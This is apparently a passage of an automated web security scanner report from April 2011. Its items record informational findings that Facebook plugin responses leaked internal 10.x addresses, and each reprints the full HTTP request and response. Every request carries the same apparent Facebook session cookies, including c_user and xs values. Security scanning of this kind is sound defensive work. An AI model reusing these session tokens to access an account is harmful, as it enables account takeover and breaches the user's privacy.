GET /plugins/like.php?href=http%3a%2f%2fwww.wptz.com%2fnews%2f27483035%2fdetail.html&layout=button_count&show-faces=false&width=125&action=recommend&font=verdana&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.15.110
X-Cnection: close
Date: Sat, 09 Apr 2011 12:30:42 GMT
Content-Length: 866

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=6084"+"&m="+m;},5000)
...[SNIP]...
14.114. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.wcax.com/Global/story.asp?S=465801&layout=after&show_faces=false&width=630&height=26&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.106.62
X-Cnection: close
Date: Sat, 09 Apr 2011 12:40:02 GMT
Content-Length: 861

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=3961"+"&m="+m;},5000)
...[SNIP]...
14.115. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.wptz.com%2fnews%2f27483035%2fdetail.html&layout=standard&show-faces=true&width=500&action=recommend&font=verdana&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.248.121
X-Cnection: close
Date: Sat, 09 Apr 2011 12:30:41 GMT
Content-Length: 861

<script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=1349"+"&m="+m;},5000)
...[SNIP]...
14.116. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.52
X-Cnection: close
Date: Sat, 09 Apr 2011 12:39:53 GMT
Content-Length: 0

14.117. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.252.126
X-Cnection: close
Date: Sat, 09 Apr 2011 12:34:17 GMT
Content-Length: 0

14.118. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.232.126
X-Cnection: close
Date: Sat, 09 Apr 2011 12:30:50 GMT
Content-Length: 0

14.119. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.25.130
X-Cnection: close
Date: Sat, 09 Apr 2011 12:31:39 GMT
Content-Length: 0

14.120. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/likebox.php?id=140859045441&width=292&connections=10&stream=true&header=true&height=587
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.234.112
X-Cnection: close
Date: Sat, 09 Apr 2011 12:29:32 GMT
Content-Length: 0

14.121. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.131.51
X-Cnection: close
Date: Sat, 09 Apr 2011 14:54:39 GMT
Content-Length: 0

14.122. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.21.77
X-Cnection: close
Date: Sat, 09 Apr 2011 15:14:52 GMT
Content-Length: 0

14.123. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.65
X-Cnection: close
Date: Sat, 09 Apr 2011 12:53:20 GMT
Content-Length: 0

14.124. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=280&height=600&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=280&height=600&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.15.126
X-Cnection: close
Date: Sat, 09 Apr 2011 12:30:45 GMT
Content-Length: 0

14.125. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.43
X-Cnection: close
Date: Sat, 09 Apr 2011 13:13:34 GMT
Content-Length: 0

14.126. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.61.65
X-Cnection: close
Date: Sat, 09 Apr 2011 13:33:48 GMT
Content-Length: 0

14.127. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.234.105
X-Cnection: close
Date: Sat, 09 Apr 2011 12:33:06 GMT
Content-Length: 0

14.128. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.137.120
Connection: close
Date: Sat, 09 Apr 2011 14:34:26 GMT
Content-Length: 0

14.129. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.35
X-Cnection: close
Date: Sat, 09 Apr 2011 15:55:17 GMT
Content-Length: 0

14.130. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.245.91
X-Cnection: close
Date: Sat, 09 Apr 2011 13:54:01 GMT
Content-Length: 0

14.131. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.149.67
X-Cnection: close
Date: Sat, 09 Apr 2011 15:35:04 GMT
Content-Length: 0

14.132. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.20.123
X-Cnection: close
Date: Sat, 09 Apr 2011 12:29:49 GMT
Content-Length: 0

14.133. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/plugins/recommendations.php?site=wptz.com&width=300&height=190&header=false&colorscheme=light&border_color=white&recommendations=true
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.85.27
X-Cnection: close
Date: Sat, 09 Apr 2011 14:14:13 GMT
Content-Length: 0

14.134. http://www.foxnews.com/static/all/js/head.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /static/all/js/head.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/all/js/head.js?1302538751 HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
